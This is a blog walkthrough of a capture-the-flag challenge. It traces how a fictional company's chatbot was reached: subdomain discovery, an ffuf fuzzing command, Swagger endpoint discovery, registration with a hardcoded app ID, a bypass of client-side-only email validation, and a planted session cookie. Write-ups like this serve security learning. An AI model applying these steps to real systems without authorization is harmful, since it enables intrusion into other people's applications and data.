HomeProjectsBlog
Published on

Wiz Cloud Security Championship Challenge 4

Authors

Welcome to my walkthrough of the Wiz Cloud Security Championship Challenge 4! This really was a needle in a haystack!

Challenge Overview

The Challenge Setup

๐ŸŽฏ Mission Brief

We have got intelligence that one of our developers at Ack-Me Corp is working on a weekend side-project where he is vibe coding an internal knowledge-base chatbot for our company, where he put all of our customer records and sensitive data inside it.

Your mission, if you choose to accept it - is to track down the website and obtain the secret flag.

๐Ÿ” Starting Point: Begin by investigating ackme-corp.net online presence and dig deep into their infrastructure. This includes going beyond the scope of the shell.

The environment already contained a number of tools.

Terminal

My Solution Approach

Although we had a number of tools included on the box I decided to first use a few of my go to sites when checking for subdomains and DNS records.

Bingo, when checking https://securitytrails.com/ I found there was an interesting subdomain for the site which was coding.pprod.testing.internal.ackme-corp.net

Security Trails

When entering the site you're met with a login panel which had an interesting URL at the bottom https://www.vibecodeawebsitetoday.com/

Login Panel

I went to the site and had a play around but none of the functionality worked. I hit a wall for a while but decided to go back to the terminal and see if we could find anything about this new site

ffuf -u https://vibecodeawebsitetoday.com/FUZZ -w /opt/wordlists/api-objects.txt -mc 200 -s

I ran the fuzzer against the api wordlist which we had been provided and it returns the swagger docs

Fuzzer Results

We were then able to hit https://vibecodeawebsitetoday.com/docs which gave us all the endpoints for the site.

Swagger

From here I was able to register myself as a user using the app_id which was hardcoded into the /login page

<div style="display:none" id="app-config" data-app-id="8b91e68a-d900-47b7-ba5e-5fdfe79c258c"></div>
Register User
{
  "status": "success",
  "message": "Registration successful. You can now login with your credentials.",
  "app_id": "8b91e68a-d900-47b7-ba5e-5fdfe79c258c",
  "verified": true,
  "dev_note": "Account auto-verified for immediate access"
}

After this I used the login endpoint on the swagger page to test my new user was working as expected and it returned a JWT token

Login
{
  "status": "success",
  "token": "JWT_HERE",
  "message": "Login successful!",
  "app_id": "8b91e68a-d900-47b7-ba5e-5fdfe79c258c"
}

I went back to the original site to try my new user but was met with an error and I saw no request went through. Checked the source as sure enough there was client side validation only.

// Client-side validation: Only allow @ackme-corp.net emails
if (!email.toLowerCase().endsWith('@ackme-corp.net')) {
  showError('Access restricted to Ack-Me Corp employees only (@ackme-corp.net emails)')
  return
}

When trying the request directly to the API using Python requests it worked and provided me with a session token cookie.

Session Token

I added this to the site using a cookie editor extension and when revisiting the root of the site I was redirected to /chat

Cookie Editor

Finally I was able to communicate with the chatbot and simply ask it for the flag which is gladly returned.

Chatbot

Conclusion

And there we have it! This challenge was an excellent demonstration of real-world reconnaissance and web application security testing techniques. The multi-stage approach required a diverse skill set that any penetration tester or bug bounty hunter should have in their arsenal.

Key cybersecurity skills demonstrated:

๐Ÿ” OSINT & Reconnaissance

  • DNS enumeration and subdomain discovery using SecurityTrails
  • Infrastructure mapping and target identification
  • Open source intelligence gathering on corporate assets

๐ŸŒ Web Application Security Testing

  • Directory/endpoint fuzzing with ffuf
  • API discovery and documentation analysis (Swagger)
  • Client-side security control bypass techniques

๐Ÿ› ๏ธ Technical Analysis

  • Source code review for hardcoded credentials and configuration
  • Client-side validation bypass through direct API interaction
  • Session management and authentication token manipulation

โš–๏ธ Security Implications This challenge highlighted several critical security issues commonly found in real-world applications:

  • Client-side validation vulnerabilities - Never trust the frontend
  • Information disclosure through hardcoded app IDs and configuration
  • Insecure direct object references in API endpoints
  • Insufficient access controls on sensitive chatbot functionality

The progression from OSINT to technical exploitation mirrors real penetration testing methodology, making this an excellent learning exercise for anyone looking to improve their offensive security skills!